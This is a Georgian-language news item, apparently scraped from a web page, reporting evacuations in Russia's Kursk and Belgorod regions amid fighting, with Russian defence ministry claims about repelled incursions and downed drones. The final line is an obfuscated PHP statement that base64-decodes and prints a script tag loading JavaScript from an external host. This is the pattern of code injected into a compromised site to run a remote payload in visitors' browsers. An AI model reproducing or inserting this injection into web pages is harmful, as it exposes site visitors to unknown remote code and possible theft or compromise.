celsiusi
ავერსი შნაიდერი

 რუსეთის კურსკის ოლქში კიდევ ერთი რაიონის მოსახლეობას ევაკუაციისკენ მოუწოდებენ. კურსკის ოლქის ადგილობრივი ხელისუფლების თქმით, ბელოვსკის რაიონში არსებულ ვითარება კვლავაც დაძაბულია. მათივე ცნობით, აღნიშნული რაიონიდან ნებაყოფლობითი ევაკუაცია გრძელდება.

მთავრობა მოუწოდებს მათ, ვინც ჯერ კიდევ არ დატოვა საშიში ზონა, ეს რაც შეიძლება მალე გააკეთოს. მოწყობილია სპეციალური პუნქტები, სადაც მოქალაქეებს სპეციალური საევაკუაციო ავტობუსები ელოდებიან.

მანამდე რუსეთის თავდაცვის სამინისტრო წერდა, რომ უკრაინელი სამხედროების ბელოვსკის რაიონში შესვლის მცდელობა აღკვეთა. რუსეთის ხელისუფლების ცნობით, მოქალაქეების ევაკუაცია ასევე დაწყებულია ბელგოროდის ოლქის კრასნოიარუჟის რაიონიდანაც. როგორც ადგილობრივი ხელისუფლება ამბობს, დღეს დილიდან ამ რაიონში უკრაინელების აქტივობა დაფიქსირდა.

რუსეთის კურსკის ოლქში საბრძოლო მოქმედებები, მეექვსე დღეა, არ წყდება.

რუსეთის თავდაცვის სამინისტრო ასევე იუწყება, რომ 12 აგვისტოს, ღამით რუსეთის ანტისაჰაერო თავდაცვის ძალებმა 18 დრონი ჩამოაგდეს კურსკის, ბელგოროდისა და ვორონეჟის ოლქებში. ოთხი უპილოტო საფრენი აპარატი ასევე ჩამოაგდეს როსტოვის ოლქშიც.

114
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");